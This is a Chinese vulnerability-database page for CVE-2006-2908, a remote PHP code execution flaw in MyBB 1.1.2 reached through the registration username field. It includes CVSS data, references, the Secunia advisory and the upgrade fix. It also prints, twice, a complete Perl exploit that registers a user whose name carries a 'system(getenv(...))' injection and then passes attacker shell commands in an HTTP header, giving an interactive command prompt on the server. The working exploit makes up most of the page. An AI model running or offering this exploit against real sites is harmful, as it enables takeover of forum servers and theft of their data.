CVE-2006-2908
CVSS7.5
发布时间 :2006-06-12 21:02:00
修订时间 :2011-03-07 21:37:16
NMCOEPS    

[原文]The domecode function in inc/functions_post.php in MyBulletinBoard (MyBB) 1.1.2, and possibly other versions, allows remote attackers to execute arbitrary PHP code via the username field, which is used in a preg_replace function call with a /e (executable) modifier.


[CNNVD]MyBB functions_post.php文件 domecode 任意代码执行漏洞(CNNVD-200606-269)

        MyBB是一款流行的Web论坛程序。
        MyBB对注册用户名的处理存在问题,远程攻击者可能利用此漏洞在服务器上执行任意命令。
        在注册的时候MyBB没有正确过滤对用户名字段的输入便在inc/functions_post.php文件domecode()函数的preg_replace调用中以"/e"修饰符使用了这些输入。攻击者可能以特制的用户名注册,然后预览包含有"/slap"字符串的贴子,导致执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2908
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2908
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-269
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/archive/1/436767/100/0/threaded
(PATCH)  BUGTRAQ  20060612 Secunia Research: MyBB "domecode()" PHP Code ExecutionVulnerability
http://secunia.com/secunia_research/2006-40/advisory/
(VENDOR_ADVISORY)  MISC  http://secunia.com/secunia_research/2006-40/advisory/
http://secunia.com/advisories/20371
(VENDOR_ADVISORY)  SECUNIA  20371
http://www.vupen.com/english/advisories/2006/2288
(UNKNOWN)  VUPEN  ADV-2006-2288
http://www.securityfocus.com/bid/18396
(UNKNOWN)  BID  18396
http://www.securityfocus.com/archive/1/archive/1/437509/100/100/threaded
(UNKNOWN)  BUGTRAQ  20060613 Proof of concept: mybb 1.1.2 remote code execution
http://www.osvdb.org/26216
(UNKNOWN)  OSVDB  26216
http://www.514.es/download/mybibi.pl
(UNKNOWN)  MISC  http://www.514.es/download/mybibi.pl
http://securitytracker.com/id?1016270
(UNKNOWN)  SECTRACK  1016270
http://xforce.iss.net/xforce/xfdb/27046
(UNKNOWN)  XF  mybb-domecode-code-execution(27046)
http://securityreason.com/securityalert/1086
(UNKNOWN)  SREASON  1086

- 漏洞信息

MyBB functions_post.php文件 domecode 任意代码执行漏洞
高危 输入验证
2006-06-12 00:00:00 2006-10-05 00:00:00
远程  
        MyBB是一款流行的Web论坛程序。
        MyBB对注册用户名的处理存在问题,远程攻击者可能利用此漏洞在服务器上执行任意命令。
        在注册的时候MyBB没有正确过滤对用户名字段的输入便在inc/functions_post.php文件domecode()函数的preg_replace调用中以"/e"修饰符使用了这些输入。攻击者可能以特制的用户名注册,然后预览包含有"/slap"字符串的贴子,导致执行任意PHP代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://www.mybboard.com/downloads.php

- 漏洞信息 (1909)

MyBulletinBoard (MyBB) < 1.1.3 Remote Code Execution Exploit (EDBID:1909)
php webapps
2006-06-13 Verified
0 Javier Olascoaga
N/A [点击下载]
#!/usr/bin/perl 
# Tue Jun 13 12:37:12 CEST 2006 jolascoaga@514.es
#
# Exploit HOWTO - read this before flood my Inbox you bitch!
#
# - First you need to create the special user to do this use:
#	./mybibi.pl --host=http://www.example.com --dir=/mybb -1
#   this step needs a graphic confirmation so the exploit writes a file 
#   in /tmp/file.png, you need to
#   see this img and put the text into the prompt. If everything is ok, 
#   you'll have a new valid user created.
# * There is a file mybibi_out.html where the exploit writes the output 
#   for debugging.
# - After you have created the exploit or if you have a valid non common 
#   user, you can execute shell commands.
#
# TIPS:
# 	* Sometimes you have to change the thread Id, --tid is your friend ;)
#	* Don't forget to change the email. You MUST activate the account.
#	* Mejor karate aun dentro ti.
#
# LIMITATIONS:
#	* If the admin have the username lenght < 28 this exploit doesn't works
#
# Greetz to !dSR ppl and unsec
#
# 514 still r0xing!

# user config.
my $uservar = "C"; # don't use large vars.
my $password = "514r0x";
my $email = "514\@mailinator.com";

use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1;   # you can choose this or another one.

my ($proxy,$proxy_user,$proxy_pass, $username);
my ($host,$debug,$dir, $command, $del, $first_time, $tid);
my ($logged, $tid) = (0, 2);

$username = "'.system(getenv(HTTP_".$uservar.")).'";

my $options = GetOptions (
  'host=s'	      => \$host, 
  'dir=s'	      => \$dir,
  'proxy=s'           => \$proxy,
  'proxy_user=s'      => \$proxy_user,
  'proxy_pass=s'      => \$proxy_pass,
  'debug'             => \$debug,
  '1'		      => \$first_time,
  'tid=s'	      => \$tid,
  'delete'	      => \$del);

&help unless ($host); # please don't try this at home.

$dir = "/" unless($dir);
print "$host - $dir\n";
if ($host !~ /^http/) {
	$host = "http://".$host;
}

LWP::Debug::level('+') if $debug;
my ($res, $req);

my $ua = new LWP::UserAgent(
           cookie_jar=> { file => "$$.cookie" });
$ua->agent("Mothilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
$ua->proxy(['http'] => $proxy) if $proxy;
$req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

create_user() if $first_time;

while () {
		login() if !$logged;

		print "mybibi> "; # lost connection
		while(<STDIN>) {
				$command=$_;
				chomp($command);
				last;
		}
		&send($command);
}

sub send  {
	chomp (my $cmd = shift);
	my $h = $host.$dir."/newthread.php";
	my $req = POST $h, [
		'subject' => '514',
		'message' => '/slap 514',
		'previewpost' => 'Preview Post',
		'action' => 'do_newthread',
		'fid' => $tid,
		'posthash' => 'e0561b22fe5fdf3526eabdbddb221caa'
	];
	$req->header($uservar => $cmd);
	print $req->as_string() if $debug;
	my $res = $ua->request($req);
	if ($res->content =~ /You may not post in this/) {
		print "[!] don't have perms to post. Change the Forum ID\n";
	} else {
		my ($data) = $res->content =~ m/(.*?)\<\!DOCT/is;
		print $data;
	}

}
sub login {
	my $h  = $host.$dir."/member.php";
	my $req = POST $h,[
		'username' => $username,
		'password' => $password,
		'submit' => 'Login',
		'action' => 'do_login'
	];
	my $res = $ua->request($req);
	if ($res->content =~ /You have successfully been logged/is) {
		print "[*] Login succesful!\n";
		$logged = 1;
	} else {
		print "[!] Error login-in\n";
	}
}

sub help {
    print "Syntax: ./$0 --host=url --dir=/mybb [options] -1 --tid=2\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "the default directory is /\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://www.server.com/\n";
    print "\n";
    exit(1);
}

sub create_user {
	# firs we need to get the img.
	my  $h = $host.$dir."/member.php";
	print "Host: $h\n";

	$req = HTTP::Request->new (GET => $h."?action=register");
	$res = $ua->request ($req);

	my $req = POST $h, [
		'action' => "register",
		'agree' => "I Agree"
	];
	print $req->as_string() if $debug;
	$res = $ua->request($req);

	my $content = $res->content();
	$content =~ m/.*(image\.php\?action.*?)\".*/is;
	my $img = $1;
	my $req = HTTP::Request->new (GET => $host.$dir."/".$img);
	$res = $ua->request ($req);
	print $req->as_string();

	if ($res->content) {
		open (TMP, ">/tmp/file.png") or die($!);
		print TMP $res->content;
		close (TMP);
		print "[*] /tmp/file.png created.\n";
	}

	my ($hash) = $img =~ m/hash=(.*?)$/;
	my $img_str = get_img_str();
	unlink ("/tmp/file.png");
	$img_str =~ s/\n//g;
	my $req = POST $h, [
		'username' => $username,
		'password' => $password,
		'password2' => $password,
		'email' => $email,
		'email2' => $email,
		'imagestring' => $img_str,
		'imagehash' => $hash,
		'allownotices' => 'yes',
		'receivepms' => 'yes',
		'pmpopup' => 'no',
		'action' => "do_register",
		'regsubmit' => "Submit Registration"
	];
	$res = $ua->request($req);
	print $req->as_string() if $debug;

	open (OUT, ">mybibi_out.html");
	print OUT $res->content;

	print "Check $email for confirmation or mybibi_out.html if there are some error\n";
}

sub get_img_str ()
{
	print "\nNow I need the text shown in /tmp/file.png: ";
	my $str = <STDIN>;
	return $str;
}
exit 0;

# milw0rm.com [2006-06-13]
		

- 漏洞信息 (F47417)

mybibi_pl.txt (PacketStormID:F47417)
2006-06-15 00:00:00
Javier Olascoaga  
exploit,proof of concept
CVE-2006-2908
[点击下载]

Proof of concept exploit for MyBB version 1.1.2 that makes use of a flaw where user input is not properly sanitized.

#!/usr/bin/perl 
# Tue Jun 13 12:37:12 CEST 2006 jolascoaga@514.es
#
# Exploit HOWTO - read this before flood my Inbox you bitch!
#
# - First you need to create the special user to do this use:
#	./mybibi.pl --host=http://www.example.com --dir=/mybb -1
#   this step needs a graphic confirmation so the exploit writes a file 
#   in /tmp/file.png, you need to
#   see this img and put the text into the prompt. If everything is ok, 
#   you'll have a new valid user created.
# * There is a file mybibi_out.html where the exploit writes the output 
#   for debugging.
# - After you have created the exploit or if you have a valid non common 
#   user, you can execute shell commands.
#
# TIPS:
# 	* Sometimes you have to change the thread Id, --tid is your friend ;)
#	* Don't forget to change the email. You MUST activate the account.
#	* Mejor karate aun dentro ti.
#
# LIMITATIONS:
#	* If the admin have the username lenght < 28 this exploit doesn't works
#
# Greetz to !dSR ppl and unsec
#
# 514 still r0xing!

# user config.
my $uservar = "C"; # don't use large vars.
my $password = "514r0x";
my $email = "514\@mailinator.com";

use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1;   # you can choose this or another one.

my ($proxy,$proxy_user,$proxy_pass, $username);
my ($host,$debug,$dir, $command, $del, $first_time, $tid);
my ($logged, $tid) = (0, 2);

$username = "'.system(getenv(HTTP_".$uservar.")).'";

my $options = GetOptions (
  'host=s'	      => \$host, 
  'dir=s'	      => \$dir,
  'proxy=s'           => \$proxy,
  'proxy_user=s'      => \$proxy_user,
  'proxy_pass=s'      => \$proxy_pass,
  'debug'             => \$debug,
  '1'		      => \$first_time,
  'tid=s'	      => \$tid,
  'delete'	      => \$del);

&help unless ($host); # please don't try this at home.

$dir = "/" unless($dir);
print "$host - $dir\n";
if ($host !~ /^http/) {
	$host = "http://".$host;
}

LWP::Debug::level('+') if $debug;
my ($res, $req);

my $ua = new LWP::UserAgent(
           cookie_jar=> { file => "$$.cookie" });
$ua->agent("Mothilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");
$ua->proxy(['http'] => $proxy) if $proxy;
$req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

create_user() if $first_time;

while () {
		login() if !$logged;

		print "mybibi> "; # lost connection
		while(<STDIN>) {
				$command=$_;
				chomp($command);
				last;
		}
		&send($command);
}

sub send  {
	chomp (my $cmd = shift);
	my $h = $host.$dir."/newthread.php";
	my $req = POST $h, [
		'subject' => '514',
		'message' => '/slap 514',
		'previewpost' => 'Preview Post',
		'action' => 'do_newthread',
		'fid' => $tid,
		'posthash' => 'e0561b22fe5fdf3526eabdbddb221caa'
	];
	$req->header($uservar => $cmd);
	print $req->as_string() if $debug;
	my $res = $ua->request($req);
	if ($res->content =~ /You may not post in this/) {
		print "[!] don't have perms to post. Change the Forum ID\n";
	} else {
		my ($data) = $res->content =~ m/(.*?)\<\!DOCT/is;
		print $data;
	}

}
sub login {
	my $h  = $host.$dir."/member.php";
	my $req = POST $h,[
		'username' => $username,
		'password' => $password,
		'submit' => 'Login',
		'action' => 'do_login'
	];
	my $res = $ua->request($req);
	if ($res->content =~ /You have successfully been logged/is) {
		print "[*] Login succesful!\n";
		$logged = 1;
	} else {
		print "[!] Error login-in\n";
	}
}

sub help {
    print "Syntax: ./$0 --host=url --dir=/mybb [options] -1 --tid=2\n";
    print "\t--proxy (http), --proxy_user, --proxy_pass\n";
    print "\t--debug\n";
    print "the default directory is /\n";
    print "\nExample\n";
    print "bash# $0 --host=http(s)://www.server.com/\n";
    print "\n";
    exit(1);
}

sub create_user {
	# firs we need to get the img.
	my  $h = $host.$dir."/member.php";
	print "Host: $h\n";

	$req = HTTP::Request->new (GET => $h."?action=register");
	$res = $ua->request ($req);

	my $req = POST $h, [
		'action' => "register",
		'agree' => "I Agree"
	];
	print $req->as_string() if $debug;
	$res = $ua->request($req);

	my $content = $res->content();
	$content =~ m/.*(image\.php\?action.*?)\".*/is;
	my $img = $1;
	my $req = HTTP::Request->new (GET => $host.$dir."/".$img);
	$res = $ua->request ($req);
	print $req->as_string();

	if ($res->content) {
		open (TMP, ">/tmp/file.png") or die($!);
		print TMP $res->content;
		close (TMP);
		print "[*] /tmp/file.png created.\n";
	}

	my ($hash) = $img =~ m/hash=(.*?)$/;
	my $img_str = get_img_str();
	unlink ("/tmp/file.png");
	$img_str =~ s/\n//g;
	my $req = POST $h, [
		'username' => $username,
		'password' => $password,
		'password2' => $password,
		'email' => $email,
		'email2' => $email,
		'imagestring' => $img_str,
		'imagehash' => $hash,
		'allownotices' => 'yes',
		'receivepms' => 'yes',
		'pmpopup' => 'no',
		'action' => "do_register",
		'regsubmit' => "Submit Registration"
	];
	$res = $ua->request($req);
	print $req->as_string() if $debug;

	open (OUT, ">mybibi_out.html");
	print OUT $res->content;

	print "Check $email for confirmation or mybibi_out.html if there are some error\n";
}

sub get_img_str ()
{
	print "\nNow I need the text shown in /tmp/file.png: ";
	my $str = <STDIN>;
	return $str;
}
exit 0;

    

- 漏洞信息 (F47405)

secunia-mybb.txt (PacketStormID:F47405)
2006-06-15 00:00:00
Andreas Sandblad  secunia.com
advisory,arbitrary,php
CVE-2006-2908
[点击下载]

Secunia Research has discovered a vulnerability in MyBB, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the username field when registering is not properly sanitized before being used in a "preg_replace" call with the "e" modifier in the "domecode()" function in inc/functions_post.php. This can be exploited to execute arbitrary PHP code by first registering with a specially crafted username and then previewing a post containing the "/slap" string. The vulnerability has been confirmed in version 1.1.2. Prior versions may also be affected.

======================================================================

                     Secunia Research 12/06/2006

         - MyBB "domecode()" PHP Code Execution Vulnerability -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

MyBB 1.1.2

Prior versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where:  Remote

======================================================================
3) Vendor's Description of Software

MyBB is a powerful, efficient and free forum package developed in PHP 
and MySQL. MyBB has been designed with the end users in mind, you and 
your subscribers. Full control over your discussion system is 
presented right at the tip of your fingers, from multiple styles and 
themes to the ultimate customisation of your forums using the 
template system.

Product link:
http://www.mybboard.com/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in MyBB, which can be 
exploited by malicious people to compromise a vulnerable system.

Input passed to the username field when registering isn't properly 
sanitised before being used in a "preg_replace" call with the "e" 
modifier in the "domecode()" function in inc/functions_post.php. This 
can be exploited to execute arbitrary PHP code by first registering 
with a specially crafted username and then previewing a post 
containing the "/slap" string.

The vulnerability has been confirmed in version 1.1.2. Prior versions 
may also be affected.

======================================================================
5) Solution

Update to version 1.1.3.
http://www.mybboard.com/downloads.php

======================================================================
6) Time Table

06/06/2006 - Initial vendor notification.
06/06/2006 - Vendor confirms vulnerability.
12/06/2006 - Public disclosure.

======================================================================
7) Credits

Discovered by Andreas Sandblad, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2006-2908 for the vulnerability.

======================================================================
9) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding
all the latest software vulnerabilities disclosed to the public. These
advisories are gathered in a publicly available database at the
Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all
relevant vulnerability information to their specific system
configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-40/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

    

- 漏洞信息

26216
MyBulletinBoard (MyBB) Registration username Field domecode() Function PHP Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Unknown

- 漏洞描述

MyBulletinBoard (MyBB) contains a flaw that allows remote PHP code execution. This flaw exists because the application does not validate input supplied to the domecode() function upon submission to the inc/functions_post.php script. Input passed to the username field when registering isn't properly sanitized before being used in a "preg_replace" call, which can be exploited by registering with a specially crafted username and then previewing a post containing the "/slap" string.

- 时间线

2006-06-12 Unknow
2006-06-13 Unknow

- 解决方案

Upgrade to version 1.1.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

MyBB DomeCode Remote PHP Script Code Injection Vulnerability
Input Validation Error 18396
Yes No
2006-06-05 12:00:00 2006-06-13 04:41:00
Andreas Sandblad, Secunia Research is credited with the discovery of this vulnerability.

- 受影响的程序版本

MyBulletinBoard MyBulletinBoard 1.1.2
MyBulletinBoard MyBulletinBoard 1.1.3

- 不受影响的程序版本

MyBulletinBoard MyBulletinBoard 1.1.3

- 漏洞讨论

MyBB is prone to a remote PHP code-injection vulnerability.

An attacker can exploit this issue to facilitate a compromise of the application and the underlying system; other attacks are also possible.

MyBB version 1.1.2 is vulnerable to this issue; prior versions may also be affected.

- 漏洞利用

This issue can be exploited through a web client.

- 解决方案

The vendor has released version 1.1.3 of MyBB to address this issue.


MyBulletinBoard MyBulletinBoard 1.1.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站